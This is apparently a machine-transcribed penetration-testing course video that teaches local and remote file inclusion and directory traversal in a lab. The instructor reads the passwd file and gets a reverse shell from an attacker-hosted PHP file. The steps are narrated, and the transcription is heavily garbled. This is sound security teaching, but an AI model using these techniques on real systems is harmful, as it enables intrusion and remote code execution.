Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody. And welcome to the cassette number 20 of the RCB course
00:06
local fall inclusion. Remote falling collision on directorate reversals. My name is Alejandro Gonna and I'll be instructor for today's session.
00:15
The learning operatives of this session is to understand the concept behind this attack and apply the techniques to implement this attack. So let's get down to business, shall we?
00:27
First let me start by for first clearing this.
00:32
And by telling you that you know what? What? This attacks, You know why? What they are in what they can do. And, you know, some basic information first,
00:44
before we we can actually performed attack. So the file inclusion vulnerability allows Attackers to include a file, you know, usually exploiting some dynamic filing collusion, um, mechanisms implemented in a target application. The vulnerability happens when you know
01:03
the problem are you are, you know,
01:06
and in the program in,
01:07
um, whoever created the tool or the program never validated the inputs, meaning that they might be calling dynamically the names off, you know, maybe a webpage. Or maybe you know something? They're just, uh,
01:26
changing the name off. What they're calling in the code. And then they're just attaching or a pendant on extension. For example. I know that some some programmers leave
01:38
names for the web pages, you know, based in countries, for example. So they just, you know, uh,
01:47
call that name I dynamically meaning that they just called, for example, the name off the variable and then attached that BHP at the end, for example. So, uh,
02:00
we have the remote filing collusion, also known as Sheriff I,
02:04
which is the process of including remote files. True. You know, the same. What I just explained. Uh, this means that
02:13
again when you're, ah, the programmer, leave that bearable, which is, you know, changing dynamically. You can actually input on your l to, you know, pointing maybe two. You're attacking machine and maybe send, um
02:30
Oh, our have on that. You're ill.
02:34
Ah, PHP code expecting to, you know, execute maybe a reverse shell, for example. You know, since remote file inclusion happens when path past to include statements are not properly sanitized or checked, um,
02:52
in a black boast black books tasting approach meaning that you don't know much about application, we should look for scripts.
02:59
You know
03:00
that. Make final X file names, for example. Let's say, let me just open a nano here for something that will not be saved. Something
03:09
60 just to show you. For example, if you have the code of the application, you can actually search for something like this. As you can see, I'm declaring a bearable here. And then I'm just calling that name off the variable meaning that maybe I'm I'm actually input
03:29
in putting something like,
03:30
I don't know, the name of the country or the name of the page. But as you can see, it is actually being include dynamically. Maybe this comes with a name like I don't know, this page dot PHP. But, you know, since some murals actually love this in the you know, the girl,
03:49
um, you can actually change the name. Or maybe
03:53
put on your l here to your malicious site, and you know it. Since it is just a pending the GHB, you can have it ready. I don't know, maybe wedding a t x t files, something like that. But, you know, uh, let me just show you here. Uh, performing the attacking was just saying something nonsense.
04:12
Uh,
04:13
you know,
04:15
for example, off I forget to mention, for example, let's say that let me just covered bases in here again,
04:20
for example. Oh, sorry. For example, the code we had
04:25
in the code we had, for example let's say that
04:30
we can't we want including the girl. So, for example, maybe the Eurail something like this so belittle Host belittle page that GHB file And you know this file. It's actually what we're calling dynamically here.
04:46
Eso we put on your really here
04:48
and these will be executed as a PHP code. So this is how dangerous this could be. And we also have local file inclusion. So this is something like Okay, we don't want Thio source. We don't actually want to do something remotely. We know that we already uploaded a backdoor, maybe
05:05
two, to the machine of the victim's machines. So we just want to
05:10
actually use a directory, traverse a which is where I'm doing right now. I'm just, you know, as this is, as you were putting ah, city that that city that dot and you know, you're actually going backwards to what you're want to where do you actually want to be?
05:25
So maybe I know that There's something in the bar directory, for example.
05:32
And I put something on my page Tha t x t, and these will be executed in here.
05:40
It's a PHP code, and you know that will happen. And I know what you're saying. Okay, this is local final inclusion, because we're actually calling this, but we're using directory Traverse A ll to actually, you know,
05:54
go from one path to the other s. So what's the difference between wear really know what the different between remote file inclusion in local falling collision. But what's the different between local fall inclusion on Directorate reversal? Well, basically, the difference is that
06:13
with this in fight local filing collusion,
06:16
the resource is loaded and executed. I guess that's the main, that the main difference is executed in the context of the application. So in this case, you will be executed in the context of I don't know, Apache West fear or whatever with several you have in Directorate Reversal,
06:36
which is
06:38
are loading and reading it the file, for example, In this case, let's say that this is actually not being executed. Maybe this this line of code, it's not in here. Um
06:49
oh, Or maybe it is, But it's not being executed, so I can actually go something like, Okay, this will not be executed. So I just want to print some information, or I just want to load and see and read some informations. Or maybe I will go to the SEC
07:08
shadow file, for example, Or the buzzword file.
07:11
Um, so I can actually print it because I don't want to execute it, or I can execute it so that I get that. That's the main difference between local falling collision and directory traverse. All but no enough with the theory. Let's get to practice
07:28
first. Let me go to this weapons. They already have the B Y machine. Turn on.
07:35
Let me go. Just go here. You know, remote luck of filing collusion, and as you can see, that you're always good so far. But what happens if I said that? The language in English? As you can see, I'm actually,
07:47
um what happens if I put it in French?
07:51
Okay. As you can see is dynamically changing in here. Ah, in.
07:58
Okay, let's go back to English again.
08:01
And as you can see, his dynamical changing. That's the point So, uh, as we remember for for, um,
08:07
the example I gave you. You can actually put that dot slash That that slash forward slash To actually test that. So let's do that. Let's see, we can actually print,
08:22
um, the buzzword files. I know. Most of the time, we don't actually get Thio to bring the shadow file, because you have to be rude to do that. And most of the time, there were applications on less. The system administrator is I don't know.
08:41
What was he thinking to put
08:43
I would paige, run, Anson Administrator bread, you know, have have seen it happen. So
08:48
don't give up hope. So we just hit that enter and we can see all the content in the buzzword file.
08:56
So this is how the directory traverse l can look like, but, you know, this is just reading information. We're just We're just really information. So what happens? What will happen if I actually want to get a reversal from this?
09:13
Remember that pitch be code is something that is executed at the server side and none of the client side.
09:20
So if we actually have to have one,
09:24
um, reverse shell on the U R L a P H B reversal. Remember, we saw that a couple of years ago. The weapon with shells or river shells that can actually be executed through BHP. Uh, we can actually have one ready in our your Eleanor in your with server.
09:43
And, you know, instead of that, instead of bringing the possible file, we can actually put the Ural to to that side.
09:50
So let's give it a try first. Remember that Callie comes with several web shells. Let me just show you here. You can go to this directory.
10:05
And as you can see, we have sbx for Microsoft for for you know, s another four months peril. Remember that way in the previous video, um, we talk about reversals, and we said that we could act. We collect, we can actually have river shells come from PERL, Python
10:24
Bash and GHB,
10:26
in this case, were interested in BHP. So let's just
10:31
bring that
10:33
And we have several reversals in here. Let's just this one. And remember, we have to put it in her web root because we want to read Redirect that execution back to our attacking machine. Just you know, the column machine itself. So
10:52
let's just copy that. Let me just cup in basic command here.
11:01
So we're already copied as you. We just went to, um,
11:05
modify day so we can go back to our listener and we're putting that in here. And why would they do we put it in in a t x t. Because at the end, most of the time I mean, that's what that is. What? You know, remote falling collusion does most of the time
11:24
is that they're, you know, changing the name, but they're not changing extension.
11:31
That equal happened for changing extension. But, you know, most of the time, they're just, you know, the code is just changing the name. So we want to put it in a t x T file so that that GHB is attached at the end of our code.
11:43
So we here put the Remember, this is a river shell. So we have to put the code. I'm sorry. Day p
11:50
Oh, for Callum Shing and poured 12 to 4. That's fine.
11:54
And close. Save it. And you know, one doctor sixties already waiting foot up for for a connection. So let me just start my Apache server.
12:07
Oh,
12:09
look at me.
12:13
So I haven't ready. Now what happens if I go to my local? You're ill
12:18
Used to see,
12:20
um when the 60.
12:24
He's already in there. As you can see, it has the right p is waiting for this. So right now, I just have to copy this
12:31
and actually put it instead. And remember that we put that or or,
12:37
um,
12:37
directory traverse along
12:41
pointing here, or the rich, richer Gerstle bath so we can load this. So now we put the your l and have it ready, you know, waiting for a connection. So let me just start. Ah, a reversal listener.
12:56
You know, Ned, cut.
13:01
I was listening. And if I heat entering here or if I, you know
13:07
go
13:11
include Ah, whatever is including that thing.
13:15
So year we're not getting anything back, so let's see what happened. Actually,
13:20
Thio, what happening here?
13:24
We're actually going to
13:28
language and we're actually leaving. Just hit going here and replace this
13:33
*** know that he's actually going to write. You are l look a host. Oh, OK, that's a problem. I don't think this will not be. And I mean this will I understand? A local host, you know, is not executing it as a local host. So let me just for the i p ng here.
13:54
Okay,
13:54
Is going to my u r l again. I have my listen already
14:00
just entered. And I says something coming up in the body, the background. And there you go. We have a river. Shalom, is this getting coffee? Okay. Okay. When my
14:11
w w data
14:13
and I'm, you know, in the Lena's be box he Emma gaining a connection from that machine so that how dangerous and militias are local file inclusion in remote filing collision By the way, local for inclusion can can achieve exacts and goal. Maybe
14:30
we already uploaded to maybe an ftp ana with an animal's log in, or maybe an s and B with also on animals, lichen or guest. Logan enabled.
14:41
We already uploaded. Um,
14:45
a ph be reversal. And, you know, we don't have the need to actually go back or go to an external euro. We can just load Ah ah, as we did with the possible file, which in just load the peace speaker were bloated. And that should be fine. I remember Some firewalls have
15:05
outbound and inbound connection restrictions. So, you know, maybe creating that from from from the euro and getting a reversal or getting something to execute on external your l Maybe you know, not that it's the best option to go. In that scenario,
15:22
you can achieve the exact same thing with local file inclusion.
15:30
What is the difference between local filing collusion and directory Traverse A ll will. The main difference is that in local file inclusions, you're actually executing something in the context of the application and in directorate reversal. You're just reading it.
15:46
Can we actually get a remote controlled through this attack? Yeah, we definitely can. I mean, we just saw an example of that
15:54
on this video will learn the concepts off this attack, and we implemented some techniques to execute this attack. And we also saw some delicious how malicious this that that can be
16:04
Ah, supplemental materials. Again, nothing changed in this matter. The hacker of labor and amazing book. And you know, again, every possible source in Google and you too
16:19
in the next media will cover password attacks s Oh, that's it for today, folks. I hope you enjoyed the video and talk to you soon.

Up Next

Offensive Penetration Testing

This is a deep course about penetration testing. In this course, you’ll learn from basic to the most advanced and modern techniques to find vulnerabilities through information gathering, create and/or use exploits and be able to escalate privileges in order to test your information systems defenses.

Instructed By

Instructor Profile Image
Alejandro Guinea
CERT Regional Director
Instructor